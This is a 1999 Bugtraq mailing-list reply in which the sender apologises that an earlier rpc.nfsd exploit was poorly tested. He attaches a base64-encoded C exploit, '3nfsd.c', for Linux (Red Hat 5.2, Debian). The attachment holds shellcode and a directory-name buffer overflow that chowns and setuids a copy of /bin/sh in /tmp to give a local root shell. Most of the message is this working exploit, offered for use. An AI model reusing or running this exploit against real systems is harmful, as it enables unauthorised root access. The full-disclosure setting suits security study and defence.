[12559] in bugtraq
Re: rpc.nfsd exploit code
daemon@ATHENA.MIT.EDU (Mariusz Marcinkiewicz)
Fri Nov 12 15:12:06 1999
Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="1958937888-338118838-942394022=:3164"
Message-Id: <Pine.LNX.4.20.9911120857240.3164-200000@mail.zigzag.pl>
Date: Fri, 12 Nov 1999 09:07:02 +0100
Reply-To: Mariusz Marcinkiewicz <tmogg@ZIGZAG.PL>
From: Mariusz Marcinkiewicz <tmogg@ZIGZAG.PL>
X-To: Crispin Cowan <crispin@cse.ogi.edu>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <382B40EE.A0DEC6C0@cse.ogi.edu>
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--1958937888-338118838-942394022=:3164
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hi
On Thu, 11 Nov 1999, Crispin Cowan wrote:
> We were unable to get this sploit to actually produce a root shell on an
> unprotected nfsd.
Sorry, this version of exploit wasn't tested well. Maybe it doesn't work
in some cases.
I attached old version of rpc.nfsd exploit. This one is local only,
shellcode will make "chown root /tmp/blah; chmod +s /tmp/blah". It should
works for you.
best regards,
tmoggie
__
Mariusz Marcinkiewicz | phone: +48 601 080 286 | mail: many@rast.lodz.pdi.net
System Administrator && Tech Support <tmogg@zigzag.pl> http://www.zigzag.pl
Security Advisor [*] tmogg@hert.org || tmogg@hack.dk [*] http://www.hert.org
--1958937888-338118838-942394022=:3164
Content-Type: TEXT/x-csrc; name="3nfsd.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.20.9911120907020.3164@mail.zigzag.pl>
Content-Description:
Content-Disposition: attachment; filename="3nfsd.c"
LyoNCiAqIHJwYy5uZnNkIGV4cGxvaXQgZm9yIExpbnV4DQogKiANCiAqIGF1
dGhvcjogdG1vZ2dpZQ0KICogZ3JlZXR6OiANCiAqICAgICAgICAgRGlHaVQg
LSBidWcgZGlzY292ZXJpbmcsIA0KICogICAgICAgICBraWwzciwgbWF4aXUg
YW5kIGFsbCBvZiBsYW0zclogR3JQDQogKiAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICANCiAqLyAgDQoNCiNpbmNsdWRlIDxzeXMvc3RhdC5o
Pg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPGZjbnRsLmg+
DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQoN
CiNkZWZpbmUgZ3JlZW4gIlxFWzMybSINCiNkZWZpbmUgYm9sZCAiXEVbMW0i
DQojZGVmaW5lIG5vcm1hbCAiXEVbbSINCiNkZWZpbmUgcmVkICJcRVszMW0i
DQoNCi8vIHNoZWxsY29kZSBmcm9tIG1heGl1ICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQovLyBjaG1v
ZCA0Nzc3IC90bXAvYmxhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgIA0KY2hhciBzaGVsbFtdID0gIlx4
ZWJceDJkXHg1ZVx4ZmVceDA2XHhmZVx4NDZceDA0XHhmZVx4NDZceDA5XHgz
MVx4YzlceDMxXHhkYiINCiAgICAgICAgICAgICAgICJceDMxXHhjMFx4YjBc
eDQ2XHhjZFx4ODBceDMxXHhkMlx4ODlceGYzXHhiMFx4MTBceGNkXHg4MFx4
NjYiDQogICAgICAgICAgICAgICAiXHhiOVx4ZmZceDA5XHg4OVx4ZjNceGIw
XHgwZlx4Y2RceDgwXHgzMVx4ZGJceDg5XHhkOFx4ZmVceGMwIg0KICAgICAg
ICAgICAgICAgIlx4Y2RceDgwXHhlOFx4Y2VceGZmXHhmZlx4ZmYudG1wLmJs
YWhceGZmXHhmZlx4ZmZceGZmLyI7ICAgICANCg0KY2hhciAqY21kID0gImNw
IC9iaW4vc2ggL3RtcC9ibGFoIjsNCg0KaW50IG9mZnNldDsNCg0KDQp2b2lk
IHVzYWdlKGNoYXIgKnByb2cpDQogew0KIHByaW50ZigiXG51c2FnZTogJXMg
PC1lIGRpcj4gWy10IHRhcmdldF0gWy1jIGNvbW1hbmRdIFxuIixwcm9nKTsN
CiAgcHJpbnRmKCJcbiAgIC1lIGRpciAgICA6IGZ1bGwgcGF0aCB0byBleHBv
cnRlZCBkaXJlY3RvcnlcbiIpOw0KICBwcmludGYoIiAgIC10IHRhcmdldCA6
ICIpOw0KICBwcmludGYoIjEgLSBSSCA1LjIgKGRlZmF1bHQpICAgMiAtIERl
YmlhbiAyLjFcbiIpOw0KICBwcmludGYoIiAgIC1jIGNvbW1hbmQ6IGNtZCB0
byBkbyBhcyBhIG5vcm1hbCB1c2VyIiBcDQogICAgICAgICAiIChkZWZhdWx0
OiBjcCAvYmluL3NoIC90bXAvYmxhaClcblxuIik7DQogIGV4aXQoMCk7DQog
fQ0KDQp2b2lkIG1haW4oaW50IGFyZ2MsIGNoYXIgKiphcmd2KSANCiB7DQog
IGludCBpLGo7DQogIGNoYXIgYnVmWzQwOTZdOw0KICBjaGFyIGJ1ZjJbNDA5
Nl07DQogIGNoYXIgdG1wWzQwOTZdOw0KDQogIGNoYXIgZXhwWzI1NV0gPSAi
ISI7DQogIGludCBhZGRyID0gMHhiZmZmZjY2NyA7IC8vIGRlZmF1bHQgUkgg
NS4yIA0KICANCiAgd2hpbGUgKDEpDQogICB7DQogICAgIGkgPSBnZXRvcHQo
YXJnYyxhcmd2LCJlOmM6dDpoIik7DQogICAgIGlmIChpID09IC0xKSBicmVh
azsNCiAgICAgc3dpdGNoIChpKSANCiAgICAgIHsNCiAgICAgICBjYXNlICdl
Jzogc3RyY3B5KGV4cCxvcHRhcmcpOyBicmVhazsNCiAgICAgICBjYXNlICdj
Jzogc3RyY3B5KGNtZCxvcHRhcmcpOyBicmVhazsNCiAgICAgICBjYXNlICd0
Jzogc3dpdGNoIChqPWF0b2kob3B0YXJnKSkNCiAgICAgICAgICAgICAgICAg
ICB7DQogICAgICAgICAgICAgICAgICAgICBjYXNlIDE6IGFkZHIgPSAweGJm
ZmZmNjY3OyBicmVhazsgLy8gZGViaWFuIDEuMg0KICAgICAgICAgICAgICAg
ICAgICAgY2FzZSAyOiBhZGRyID0gMHhiZmZmZjY1NTsgYnJlYWs7IC8vIHJo
IDUuMg0KICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICBkZWZhdWx0IDog
dXNhZ2UoYXJndlswXSk7IGJyZWFrOw0KICAgICAgfQ0KICAgfQ0KICBpZiAo
IXN0cmNtcChleHAsIiEiKSkgdXNhZ2UoYXJndlswXSk7DQogIHByaW50Zihi
b2xkImNtZCIpOyANCiAgaWYgKHN5c3RlbShjbWQpICE9IDApDQogICAgew0K
ICAgICAgcHJpbnRmKHJlZCIuLi4uZmFpbGVkIVxuIm5vcm1hbCk7DQogICAg
ICBleGl0KC0xKTsNCiAgICB9DQogIHByaW50Zihub3JtYWwgZ3JlZW4iXHRP
a1xuIm5vcm1hbCk7DQogIA0KICBvZmZzZXQgPSBzdHJsZW4oZXhwKTsNCiAg
aWYgKGV4cFtvZmZzZXQtMV0gIT0gJy8nKSBzdHJjYXQoZXhwLCIvIik7DQog
IG9mZnNldCA9IHN0cmxlbihleHApOw0KICBiemVybyhidWYsc2l6ZW9mKGJ1
ZikpOw0KICBtZW1zZXQodG1wLCdBJywyNTUpOw0KICB0bXBbMjU1XT0nLyc7
DQogIHRtcFsyNTZdPSdcMCc7DQogIHN0cm5jcHkoYnVmLGV4cCxvZmZzZXQp
Ow0KICBwcmludGYoYm9sZCJkaXJzIik7DQogIGZvciAoaT0xO2k8PTM7aSsr
KSAgICANCiAgIHsgDQogICAgc3RybmNhdChidWYsdG1wLHN0cmxlbih0bXAp
KTsgIA0KICAgIGlmIChta2RpcihidWYsMDc3NykgPCAwKQ0KICAgICAgew0K
ICAgICAgIHByaW50ZihyZWQiLi4uZnVjayEgY2FuJ3QgY3JlYXRlIGRpcmVj
dG9yeSEhISA6ICVkXG4ibm9ybWFsLGkpOw0KICAgICAgIGV4aXQoLTEpOw0K
ICAgICAgfQ0KICAgfSAgIA0KICBtZW1zZXQodG1wLCdBJywyNTUpOw0KICB0
bXBbMjU1LW9mZnNldF09Jy8nOw0KICB0bXBbMjU2LW9mZnNldF09J1wwJzsN
CiAgc3RybmNhdChidWYsdG1wLHN0cmxlbih0bXApKTsNCiAgaWYgKG1rZGly
KGJ1ZiwwNzc3KSA8IDApDQogICB7DQogICAgcHJpbnRmKHJlZCIuLi5mdXFu
IG9mZnNldCBkaXJXIyQjQCUjJF4lVCNcbiJub3JtYWwpOw0KICAgIGV4aXQo
LTEpOw0KICAgfSANCiAgbWVtc2V0KHRtcCwnXHg5MCcsMjU1KTsNCiAgc3Ry
Y3B5KHRtcCsoMjU1LXN0cmxlbihzaGVsbCkpLHNoZWxsKTsgDQogIHN0cm5j
YXQoYnVmLHRtcCxzdHJsZW4odG1wKSk7DQogIGlmIChta2RpcihidWYsMDc3
NykgPCAwKQ0KICAgew0KICAgIHByaW50ZihyZWQiLi4uZnVjayFAIyBzaGVs
bC1kaXJcbiJub3JtYWwpOw0KICAgIGV4aXQoLTEpOw0KICAgfSANCiAgbWVt
c2V0KHRtcCwnYScsMjU1KTsNCiAgdG1wWzk3XSA9ICdcMCc7IA0KICAqKChp
bnQqKSh0bXArOTMpKSA9IGFkZHI7DQogIHN0cm5jYXQoYnVmLHRtcCxzdHJs
ZW4odG1wKSk7DQogIGlmIChta2RpcihidWYsMDc3NykgPCAwKQ0KICAgewkg
IA0KICAgIHByaW50ZihyZWQiLi4uZnVjayFAIyFAIyEkIGFkZHJlei1kaXIg
XlxuIm5vcm1hbCk7DQogICAgZXhpdCgtMSk7DQogICB9IA0KICBwcmludGYo
bm9ybWFsIGdyZWVuIlx0T2tcbiJub3JtYWwpOw0KICBwcmludGYoIm5vdyB5
b3UgaGF2ZSB0byBkbzogImJvbGQgZ3JlZW4gXA0KCSAicm0gLXJmIC9wYXRo
LXRvLW1vdW50LXBvaW50L0FbdGFiXSAmIFxuXG4ibm9ybWFsKTsNCn0NCg==
--1958937888-338118838-942394022=:3164--
